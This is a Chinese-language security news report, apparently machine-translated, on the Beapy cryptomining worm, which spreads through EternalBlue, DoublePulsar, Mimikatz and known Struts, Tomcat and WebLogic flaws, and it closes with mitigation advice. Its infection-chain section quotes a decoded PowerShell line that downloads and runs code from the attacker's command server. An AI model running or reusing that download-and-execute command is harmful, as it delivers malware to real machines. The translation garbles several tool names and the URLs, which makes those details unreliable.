bea 新恶意软件利用NSA黑客工具在企业网络中传播

还记得著名的黑客组织影子经纪人吗，他们什么也没做，只是做了一些惊人的事情？由于影子经纪人在2016年窃取并宣传了美国国家安全局(NSA)用于渗透全球设备和网络的一系列恶意程序，这些恶意程序必须定期出来刷存在感。

一个

背景

赛门铁克发现了一种新的加密挖掘恶意软件，主要针对企业。这种被称为Beapy的恶意软件，利用NSA黑客工具ExeCutive Blue(ExeCutive Blue)和窃取的硬编码凭据在网络中快速传播，从而从受感染的计算机中收集凭据，迫使计算机运行挖掘代码来挖掘加密的数字现金——包括修复的计算机，主要影响中国企业。

Beapy活动最早发现于2019年1月，从3月初开始越来越活跃，也出现在网络服务器上。

Beapy(W32。Beapy)是一个基于文件的coinminer，它使用电子邮件作为初始感染媒介。此次活动表明，虽然加密货币挖掘活动自2018年初以来有所下降，但仍是部分网络犯罪分子关注的焦点，企业现已成为主要攻击目标。

Beapy的受害者几乎都是企业。虽然研究人员没有证据表明这些攻击是有针对性的，但Beapy的蠕虫功能表明它可能在整个企业网络中传播。

Beapy对亚洲企业影响最大，80%以上的受害者位于中国，其他受害者位于韩国、日本、菲律宾、越南、孟加拉国，部分美国企业(美国、牙买加)也受到影响。

2

感染链

Beapy使用恶意电子邮件作为初始载体，其中包含恶意Excel文档的附件。如果电子邮件收件人打开恶意附件，目标计算机将下载后门。NSA开发的双脉冲星。安装后门后，可以在受感染的计算机上远程执行代码。永恒蓝利用视窗中小企业协议中的漏洞，允许文件在网络上水平传播。

安装DoublePulsar后执行PowerShell命令，并在将coinminer下载到目标计算机之前联系Beapy命令和控制(c&c)服务器。

根据研究人员捕获的样本，活动早在2019年2月15日就开始了，当时第一次探测到了双脉冲星的后门。然后，研究人员发现了正在执行的PowerShell命令，其解码如下:iex (new-objectnet.webclient)。downloadstring(' http://v . beahh . com/v "+$ env:user domain)。执行了一些PowerShell命令后，会下载挖掘模块，以“无文件”的方式挖掘门罗币。

Beapy先攻击未打补丁的电脑，然后用永恒蓝(ForeverBlue)感染其他机器。但Beapy不仅使用NSA黑客工具进行传播，还使用Hacktool。Mimikatz是一种窃取凭据的工具，它试图从受感染的计算机上收集凭据，并使用硬编码的用户名和密码列表来试图在网络上传播。

三

网络服务器

赛门铁克遥测公司还在一个开放的网络服务器上发现了老版本的Beapy。该蠕虫试图通过生成IP地址列表来感染连接到服务器的计算机。

Web服务器上找到的Beapy版本比较老，是用c语言写的，而新版本的Beapy是用Python写的。但是，功能是相似的。下载的恶意软件还包括Mimikatz模块的凭据收集和永恒蓝色利用功能。

在被感染的Web服务器中，Beapy还试图利用Apache Struts漏洞(CVE-2017-5638)，该漏洞已于2017年修复，但一旦成功利用该漏洞，就可以执行远程代码。Beapy还试图利用Apache Tomcat(CVE-2017-12615)和Oracle WebLogic服务器(CVE-2017-10271)中的已知漏洞。

总的来说，从3月初开始，Beapy活动一直在增加。

四

永恒蓝色和双脉冲星

永恒蓝和双脉冲星是影子经纪人发布的NSA黑客工具，在2017年毁灭性的WannaCry ransomware攻击中使用。

永恒蓝专门远程攻击Windows文件共享端口(端口445)，让犯罪分子无需任何用户操作，就能在计算机和服务器上植入ransomware、远程控制木马、虚拟货币采掘机等恶意程序。

在此活动中，攻击者更新了永恒蓝色下载器特洛伊木马，并在更新后启用了新的C2域名。永恒蓝下载器木马不断更新，最新更新时间表如下:

在NSA的一系列SMB利用背后，最终会使用DoublePulsar后门。DoublePulsar后门是一个无文件内核级的SMB后门。一旦在后门植入安全系统，就可以长时间远程控制，系统就不再安全。

受DoublePulsar的启发，美国网络安全公司RiskSence的研究员肖恩·狄龙(Sean Dillon)创建了一个名为“SMBdoor”的恶意软件后门，突出了防病毒产品没有注意到的操作系统部分。一旦安装了SMBdoor后门，它将滥用srvnet.sys进程中未记录的API，并将自己注册为服务器消息块(SMB)连接的有效处理程序。这个后门非常隐蔽，因为它没有绑定任何本地套接字、开放端口或钩子到现有的功能，从而避免触发一些防病毒系统警报。

但是SMBdoor代码主要用于学术研究，网络罪犯不能像部署DoublePulsar一样从GitHub下载并感染用户。

五

对企业的影响

虽然加密货币挖掘恶意软件的破坏性不如ransomware，但它可能仍然会对公司的运营产生重大影响。对企业的潜在影响包括:

设备性能下降，导致生产力下降；设备不稳定或无法使用，导致IT成本增加；企业成本增加，原因有二：用电量增加；有些企业使用的云服务按CPU使用率收费。

因此，企业需要确保其网络免受各种网络安全威胁。

六

建议

1.检查不正确的Powershell进程、异常的网络访问和异常的CPU占用率，使用杀毒软件及时对系统进行全面扫描。

2.安装永恒蓝漏洞补丁，手动下载，请访问以下页面:https://TechNet . Microsoft . com/zh-cn/library/security/ms17-010 . aspx，其中WinXP和Windows Server 2003的用户应访问:

https://www.catalog.update.microsoft.com/Search.aspx? q = KB 4012598 .

3.尝试关闭不必要的端口，如445、135、139等。端口3389、5900等。可以被列入白名单，并且只允许白名单中的IP连接登录。

4.对没有互联要求的服务器/工作站的内部访问设置相应的控制，防止可以连接到外部网络的服务器被攻击成为进一步攻击其他服务器的跳板。

5.定期对重要文件和数据(如数据库)进行非本地备份。

6.服务器使用高强度密码，不使用弱密码，防止黑客暴力破解。

7.在终端/服务器上部署专业的杀毒软件，防止病毒木马入侵。Web服务器可以部署在腾讯云等具有专业安全防护能力的云服务中。